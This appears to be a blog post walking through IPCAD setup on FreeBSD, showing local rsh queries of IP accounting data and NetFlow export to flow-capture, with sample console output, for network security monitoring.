Once IPCAD was running, I could query it as shown next. I ignore the "Connection refused" error caused by running an IPv6-enabled TCP/IP stack but not offering the rsh server in an IPv6-enabled manner.

orr:/root# rsh localhost stat
connect to address ::1: Connection refused
Trying 127.0.0.1...
Interface wi0: received 833, 5 m average 773 bytes/sec, 1 pkts/sec, dropped 0
Flow entries made: 32
Memory usage: 0% (2816 from 1048576)
Free slots for rsh clients: 9
IPCAD uptime is 2 minutes
orr.taosecurity.com uptime is 17 minutes

We can also check the status of our interface. This should look similar to Cisco fans.

orr:/root# rsh localhost show interface wi0
connect to address ::1: Connection refused
Trying 127.0.0.1...
wi0 is up, line protocol is up
Hardware is Ethernet, address is 0004.e229.3bba
Internet address is 131.106.57.173 255.255.248.0
IP broadcast address is 131.106.63.255
Encapsulation Ethernet, loopback not set
MTU 1500 bytes, BW 11000 Kbit
Input queue: 0 drops
Last administrative status change at Thu Apr 14 02:58:55 2005
5 minute average rate 4208 bits/sec, 1 packets/sec
1914 packets input, 775739 bytes, 0 no buffer
0 input errors, 0 CRC, 0 frame, 0 overrun, 0 ignored, 0 abort
704 packets output, 144852 bytes, 0 underruns
0 output errors, 45 collisions, 0 interface resets, 0 restarts

Next I ask IPCAD to display Cisco accounting data.

orr:/root# rsh localhost show ip accounting
connect to address ::1: Connection refused
Trying 127.0.0.1...

Source Destination Packets Bytes
131.106.57.229 255.255.255.255 2 656
192.168.75.1 255.255.255.255 1 60
131.106.57.79 131.106.63.255 6 468
131.106.57.229 239.255.255.250 3 483
131.106.57.229 224.0.0.22 2 80
131.106.57.229 131.106.63.255 39 5237
216.218.215.226 131.106.57.173 6 3329
131.106.57.173 216.218.215.226 8 1147
66.35.250.209 131.106.57.173 16 2255
131.106.57.173 66.35.250.209 15 2039
...edited...
131.106.57.83 224.0.0.251 1 32
0.0.0.0 224.0.0.1 3 84
131.106.56.1 255.255.255.255 1 328
0.0.0.0 255.255.255.255 15 4920

Accounting data age is 2
Accounting data age exact 163
Accounting data saved 1113448566
Interface wi0: received 874, 5 m average 726 bytes/sec, 1 pkts/sec, dropped 0
Flow entries made: 34
Memory usage: 0% (2992 from 1048576)
Free slots for rsh clients: 9
IPCAD uptime is 2 minutes
orr.taosecurity.com uptime is 18 minutes

This is very useful data. You can periodically dump these records, and then grep them to see the level of activity of hosts of interest.

You can collect more granular data by changing one line of the ipcad.conf file:

capture-ports enable;

As the ipcad.conf man page states:

capture-ports { enable | disable };

Make ipcad account for UDP/TCP ports, IP protocol and ICMP types on
a per-interface basis. This setting is relevant for RSH and inter-
active export methods only. Capturing UDP and TCP is disabled by
default to maintain historic RSH output format compatibility. To
selectively enable capturing ports on certain interfaces, specify
the capture-ports between the appropriate interface configuration
statements.

After making the change, I stop and start IPCAD.

orr:/root# rsh localhost shutdown
connect to address ::1: Connection refused
Trying 127.0.0.1...
Shutdown process started
orr:/root# ipcad -drs
Opening wi0... [LCap] [ERSH] [4096] Initialized as 1
Configured RSH Server listening at 127.0.0.1
No valid entries found in ipcad.dump.
Daemonized.

I clear the accounting database for good measure, pause, and then check some records.

orr:/root# rsh localhost clear ip accounting
connect to address ::1: Connection refused
Trying 127.0.0.1...
IP accounting cleared
orr:/root# rsh localhost show ip accounting
connect to address ::1: Connection refused
Trying 127.0.0.1...

Source Destination Packets Bytes SrcPt DstPt Proto IF
207.171.166.48 131.106.57.173 60 82444 80 53255 6 wi0
131.106.57.173 207.171.166.48 37 2102 53255 80 6 wi0
207.171.166.48 131.106.57.173 10 1145 80 57108 6 wi0
131.106.57.173 207.171.166.48 8 1547 57108 80 6 wi0
131.106.56.1 131.106.57.173 1 220 53 59064 17 wi0
131.106.57.173 131.106.56.1 1 60 59064 53 17 wi0
131.106.56.1 131.106.57.173 1 60 53 51547 17 wi0
...edited...
131.106.58.189 224.0.0.251 3 2240 5353 5353 17 wi0
131.106.58.191 131.106.63.255 2 156 49407 137 17 wi0

Interface wi0: received 560, 5 m average 485 bytes/sec, 0 pkts/sec, dropped 0
Flow entries made: 19
Memory usage: 0% (1672 from 1048576)
Free slots for rsh clients: 9
IPCAD uptime is 2 minutes
orr.taosecurity.com uptime is 46 minutes

We have gotten closer to the realm of NSM session data here. While we have socket information (source IP, source port, destination IP, destionation port), we do not have timestamps. I prefer to leave the port information out of the equation and just keep the IP and byte counts.

There is one final aspect of IPCAD that deserves mention. In my book I mention Fprobe and ng_netflow as software-based NetFlow collectors. It turns out that IPCAD has the same functionality. IPCAD can act as a probe and send NetFlow records to a collector like Flow-capture in the Flow-tools collection.

Let's set up Flow-capture to collect NetFlow records:

orr:/root# mkdir -p /nsm/netflow/ipcad/wi0
orr:/root# flow-capture -w /nsm/netflow/ipcad/wi0 localhost/localhost/9995

I verify that Flow-capture is listening on the port I specified:

orr:/root# sockstat -4
USER COMMAND PID FD PROTO LOCAL ADDRESS FOREIGN ADDRESS
root flow-captu 919 1 udp4 127.0.0.1:9995 *:*

Now I tell IPCAD to export NetFlow records by adding the following to the end of the ipcad.conf file.

netflow export destination 127.0.0.1 9995

Again I shut down IPCAD, restart it, and then clear the records. Notice that IPCAD reports a NetFlow destination.

orr:/root# rsh localhost shutdown
connect to address ::1: Connection refused
Trying 127.0.0.1...
Shutdown process started
orr:/root# ipcad -drs
Opening wi0... [LCap] [ERSH] [4096] Initialized as 1
Configured RSH Server listening at 127.0.0.1
Configured NetFlow destination at 127.0.0.1:9995
138 elements got from ipcad.dump.
Daemonized.

After a few minutes I check IPCAD's status.

orr:/root# rsh localhost status
connect to address ::1: Connection refused
Trying 127.0.0.1...
Interface wi0: received 548, 5 m average 683 bytes/sec, 1 pkts/sec, dropped 0
Flow entries made: 193
NetFlow cached flows: 21
Memory usage: 1% (16984 from 1048576)
Free slots for rsh clients: 9
IPCAD uptime is 2 minutes
orr.taosecurity.com uptime is 1 hour,

Notice how IPCAD reports 21 cached NetFlows. This caused a problem, since apparently IPCAD had not flushed any flows to disk yet. I got the following error when trying to read the flows using Flow-cat and Flow-print:

orr:/root# flow-cat /nsm/netflow/ipcad/wi0/2005/2005-04/2005-04-13/ | flow-print
flow-print: ftiheader_read(): Warning, short read while loading header top.
flow-print: ftiheader_read(): failed
flow-print: ftio_init(): failed

Looking at the directory holding the flows, we see only a .tmp file:

orr:/root# ls /nsm/netflow/ipcad/wi0/2005/2005-04/2005-04-13/
tmp-v05.2005-04-13.235643-0400

One minute later I check IPCAD's status again:

orr:/root# rsh localhost status
connect to address ::1: Connection refused
Trying 127.0.0.1...
Interface wi0: received 638, 5 m average 638 bytes/sec, 0 pkts/sec, dropped 0
Flow entries made: 195
NetFlow cached flows: 0
Memory usage: 1% (17160 from 1048576)
Free slots for rsh clients: 9
IPCAD uptime is 4 minutes
orr.taosecurity.com uptime is 1:01

Now we see zero cached flows, so I use Flow-cat and Flow-print again.

orr:/root# flow-cat /nsm/netflow/ipcad/wi0/2005/2005-04/2005-04-13/ | flow-print
srcIP dstIP prot srcPort dstPort octets packets
131.106.56.63 224.0.0.251 17 5353 5353 686 2
131.106.58.184 224.0.0.251 17 5353 5353 189 1
0.0.0.0 224.0.0.1 2 65535 65535 28 1
...edited...
131.106.57.94 131.106.63.255 17 137 137 702 9
131.106.57.94 131.106.63.255 17 138 138 817 4
66.102.15.100 131.106.57.173 6 80 53759 125977 133
131.106.57.173 66.102.15.100 6 53759 80 47834 102
...truncated...

We can view these records because the .tmp file is replaced by a real flow record:

orr:/root# ls /nsm/netflow/ipcad/wi0/2005/2005-04/2005-04-13/
ft-v05.2005-04-13.235643-0400

Hopefully you have a better idea how NetFlow works. If you're a student, you have additional material I discussed in class but didn't appear on the slides!

Also -- here is a link to my blog entry on the method I'm using now to bond interfaces into ngeth0 on FreeBSD 5.3. Here is a link to my post on Flowgrep.

For news on the new Sguil FreeBSD port submissions, check on Problem Report ports/77473 for the Sguil-sensor and Problem Report ports/77690 for the Sguil-server.